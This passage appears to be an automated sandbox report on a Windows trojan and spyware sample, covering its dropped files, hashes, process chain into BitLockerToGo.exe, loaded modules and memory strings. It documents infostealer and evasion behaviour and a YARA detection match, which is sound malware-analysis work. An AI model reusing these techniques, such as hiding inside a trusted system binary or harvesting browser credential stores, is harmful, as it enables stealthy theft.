Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042D420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040B4E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004264BD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040C560
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00448560
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00405500
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043E5C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042C5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004385A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042F662
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00409602
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00407620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042D621
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004466F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004247C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040E780
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040A8F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00416892
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00445950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00403960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042E9BD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040BA50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00429A2F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00411789
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00436A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00446AA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00421AB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00442AB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042BABB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041DB48
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00424B50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00420B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042FB39
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00446BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041EC80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043CC90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00445D40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00425D7B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00429E48
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00422E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042AE18
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042AEE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00423E90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042DF77
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00420FE9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00446F80
              Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5GuiVBox.dll 86F6A04FE611CA402D3C4841561F5B396CE61F0212BB6DA58C7274532E2CFD14
              Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5SqlVBox.dll EAA9EFDE1704FA6ABBEF9878EECFA386E89003F23E07ADCAF641A6C741893BA1
              Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxClient-x86.dll 84B47308ABC293515FA8B682D7EDE3A53FED426A7073CFEC466BCDE681DA715F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0040D040 appears 68 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0041E8C0 appears 234 times
              Source: libidn2-0.dll.0.dr Static PE information: Number of sections : 11 > 10
              Source: libintl-8.dll.0.dr Static PE information: Number of sections : 12 > 10
              Source: libiconv-2.dll.0.dr Static PE information: Number of sections : 12 > 10
              Source: 00000001.00000002.1881484672.000000000A7D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/13@10/2
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Code function: 0_2_00007FF70ECD3BF8 GetLastError,FormatMessageW,LocalFree
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 2_2_0043D8D0 CoCreateInstance
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Code function: 0_2_00007FF70ECEC260 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0
              Source: HLZwUhcJ28.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File read: C:\Windows\win.ini
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: qsqlite.dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: qsqlite.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: qsqlite.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: qsqlite.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: qsqlite.dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: qsqlite.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: BitLockerToGo.exe, 00000002.00000003.1924561686.0000000005066000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1925169464.000000000504A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: qsqlite.dll.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: HLZwUhcJ28.exe ReversingLabs: Detection: 50%
              Source: Imperial_Delay.exe String found in binary or memory: &github.com/filecoin-project/go-address
              Source: Imperial_Delay.exe String found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine (BADINDEX)%!(NOVERB)Connectionlocal-addrSet-Cookie; Expires=; Max-Age=; HttpOnly stream=%d:authorityset-cookieuser-agentkeep-aliveconnectionHost: %s
              Source: Imperial_Delay.exe String found in binary or memory: stopm spinning nmidlelocked= needspinning=store64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine RegSetValueExWContent-Length; SameSite=LaxERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eofinternal errorunknown error unknown code: Not AcceptableMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAM.WithDeadline(<not Stringer>.in-addr.arpa.unknown mode: invalid syntax1907348632812595367431640625unexpected EOFunsafe.Pointer on zero Valuereflect.Value.unknown method^[a-f0-9]{64}$^[a-f0-9]{96}$CLICOLOR_FORCEerrdefs.Vertexerrdefs.Sourceexec.meta.baseexec.mount.sshexec.secretenvpb.ExportCachereserved_rangefield_presencemurmur3-x64-64ControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDOpenSCManagerWSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWModule32FirstWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWunreachable: /log/filter.go/log/helper.goboringcrypto: data truncated
              Source: Imperial_Delay.exe String found in binary or memory: depgithub.com/filecoin-project/go-addressv1.1.0h1:ofdtUtEsNxkIxkDw67ecSmvtzaVSdcea4boAmLbnHfE=
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.init.0
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.glob..func1
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Bytes
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.glob..func2
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Protocol
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Payload
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.String
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Empty
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Unmarshal
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Marshal
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalJSON
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalJSON
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Scan
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.NewActorAddress
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.addressHash
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.NewFromBytes
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.newAddress
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.encode
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Checksum
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.base32decode
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.decode
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.ValidateChecksum
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.hash
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalBinary
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalBinary
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalCBOR
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalCBOR
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.init.1
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.init
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Bytes
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Empty
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Marshal
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalBinary
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalJSON
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Payload
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Protocol
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).String
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Unmarshal
              Source: Imperial_Delay.exe String found in binary or memory: net/addrselect.go
              Source: Imperial_Delay.exe String found in binary or memory: google.golang.org/grpc@v1.64.0/internal/balancerload/load.go
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
              Source: Imperial_Delay.exe String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/constants.go
              Source: Imperial_Delay.exe String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File read: C:\Users\user\Desktop\HLZwUhcJ28.exe
              Source: unknown Process created: C:\Users\user\Desktop\HLZwUhcJ28.exe "C:\Users\user\Desktop\HLZwUhcJ28.exe"
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe"
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: version.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: dxgidebug.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: sfc_os.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: riched20.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: usp10.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: msls31.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: windowscodecs.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: textshaping.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: appresolver.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: slc.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: pcacli.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: windows.fileexplorer.common.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: ntshrui.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Section loaded: cscapi.dll
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe Section loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe Section loaded: umpdc.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
              Source: HLZwUhcJ28.exe Static PE information: Image base 0x140000000 > 0x60000000
              Source: HLZwUhcJ28.exe Static file information: File size 13706949 > 1048576
              Source: HLZwUhcJ28.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: HLZwUhcJ28.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: HLZwUhcJ28.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: HLZwUhcJ28.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: HLZwUhcJ28.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: HLZwUhcJ28.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: HLZwUhcJ28.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: HLZwUhcJ28.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb00 source: Qt5SqlVBox.dll
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxClient-x86\VBoxClient-x86.pdb source: VBoxClient-x86.dll.0.dr
              Source: Binary string: BitLockerToGo.pdb source: Imperial_Delay.exe, 00000001.00000002.1881484672.000000000A700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5GuiVBox.pdb source: Qt5GuiVBox.dll
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxClient-x86\VBoxClient-x86.pdb<<9 source: VBoxClient-x86.dll.0.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: Imperial_Delay.exe, 00000001.00000002.1881484672.000000000A700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: HLZwUhcJ28.exe
              Source: Binary string: R:\tinderbox\win-qt-5.15\out\qtbase\plugins\sqldrivers\qsqlite.pdb source: qsqlite.dll.0.dr
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb source: Qt5SqlVBox.dll
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxProxyStub-x86\VBoxProxyStub-x86.pdb source: VBoxProxyStub-x86.dll.0.dr
              Source: HLZwUhcJ28.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: HLZwUhcJ28.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: HLZwUhcJ28.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: HLZwUhcJ28.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: HLZwUhcJ28.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6902359
              Source: HLZwUhcJ28.exe Static PE information: section name: .didat
              Source: HLZwUhcJ28.exe Static PE information: section name: _RDATA
              Source: VBoxProxyStub-x86.dll.0.dr Static PE information: section name: .orpc
              Source: Imperial_Delay.exe.0.dr Static PE information: section name: .symtab
              Source: libiconv-2.dll.0.dr Static PE information: section name: .xdata
              Source: libidn2-0.dll.0.dr Static PE information: section name: .xdata
              Source: libintl-8.dll.0.dr Static PE information: section name: .xdata
              Source: qsqlite.dll.0.dr Static PE information: section name: .qtmetad
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 2_2_0044CE5D push esp; retf 2_2_0044CE67
              Source: initial sample Static PE information: section name: UPX0
              Source: initial sample Static PE information: section name: UPX1
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\qsqlite.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5GuiVBox.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxProxyStub-x86.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libintl-8.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxClient-x86.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5SqlVBox.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libidn2-0.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libiconv-2.dll
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Security-Common.dll
